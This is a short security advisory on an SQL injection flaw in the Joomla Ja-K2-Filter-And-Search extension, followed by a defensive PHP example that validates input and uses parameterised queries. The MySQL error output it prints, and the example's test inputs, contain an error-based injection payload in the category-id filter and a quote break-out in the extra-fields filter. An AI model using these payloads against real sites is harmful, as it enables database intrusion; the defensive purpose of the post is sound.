Joomla Ja-K2-Filter-And-Search SQL Injection Vulnerability

October 20, 2016 • Security



If the output contains the following (including: You have an error in your SQL syntax;), the vulnerability is present:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"') AND (i.fulltext LIKE '%the%') ORDER BY DESC LIMIT 0, 9' at line 1 SQL=SELECT DISTINCT i.*, CASE WHEN i.modified = 0 THEN i.created ELSE i.modified END as lastChanged, as categoryname, as categoryid, c.alias as categoryalias, c.params as categoryparams FROM #__k2_items as i RIGHT JOIN #__k2_categories AS c ON = i.catid WHERE i.published = 1 AND i.access IN(1,1,5) AND i.trash = 0 AND c.published = 1 AND c.access IN(1,1,5) AND c.trash = 0 AND ( i.publish_up = '0000-00-00 00:00:00' OR i.publish_up <= '2016-10-20 03:44:31' ) AND ( i.publish_down = '0000-00-00 00:00:00' OR i.publish_down >= '2016-10-20 03:44:31' ) AND i.catid IN ((select 1 and row(1, 1)>(select count(*), concat(concat(CHAR(52), CHAR(67), CHAR(117), CHAR(117), CHAR(82), CHAR(57), CHAR(71), CHAR(65), CHAR(77), CHAR(98), CHAR(77)), floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))) AND (i.extra_fields REGEXP '{"id":"2","value":[^{]*"5'"') AND (i.fulltext LIKE '%the%') ORDER BY DESC LIMIT 0, 9
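
In the error above, request data reaches the query in two places: the `i.catid IN (...)` list and the `i.extra_fields REGEXP` literal. The following plain-PHP sketch shows how both filters can be built safely; it is an added example, not the extension's code, and the function names, the input shape and the allowed value format are assumptions.

```php
<?php
// Added example, not the extension's code; function names and input shape are hypothetical.
/** Accept only decimal category ids; anything else rejects the request. */
function k2_category_ids(array $raw): array
{
    $ids = [];
    foreach ($raw as $value) {
        // ctype_digit() is false for '', signs, spaces, quotes and parentheses,
        // so a subquery in place of an id never reaches the SQL string.
        if (!is_string($value) || !ctype_digit($value) || strlen($value) > 9) {
            throw new InvalidArgumentException('invalid category id');
        }
        $ids[] = (int) $value;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no category ids');
    }
    return array_values(array_unique($ids));
}

/** Build both filters with placeholders instead of string concatenation. */
function k2_filter_clause(array $rawCatIds, string $fieldId, string $fieldValue): array
{
    $ids = k2_category_ids($rawCatIds);
    // Assumption: extra-field ids are numeric and option values are short
    // alphanumeric tokens, so no quote or regex metacharacter is accepted.
    if (!ctype_digit($fieldId) || !preg_match('/\A[A-Za-z0-9]{1,32}\z/', $fieldValue)) {
        throw new InvalidArgumentException('invalid extra field filter');
    }
    $pattern = '{"id":"' . $fieldId . '","value":[^{]*"' . $fieldValue;
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql = "i.catid IN ($marks) AND i.extra_fields REGEXP ?";
    return [$sql, array_merge($ids, [$pattern])];
}

// Constructed inputs: one normal request, then the two shapes from the error output.
$requests = [
    [['3', '7'], '2', '5'],
    [['(select 1 and row(1, 1)>(select count(*) ...))'], '2', '5'],
    [['3'], '2', "5'\""],
];
foreach ($requests as [$catIds, $fieldId, $fieldValue]) {
    try {
        [$sql, $params] = k2_filter_clause($catIds, $fieldId, $fieldValue);
        echo $sql, ' ', json_encode($params), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The returned fragment and parameter list are meant to be passed to a prepared statement, so the database never parses request data as SQL.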


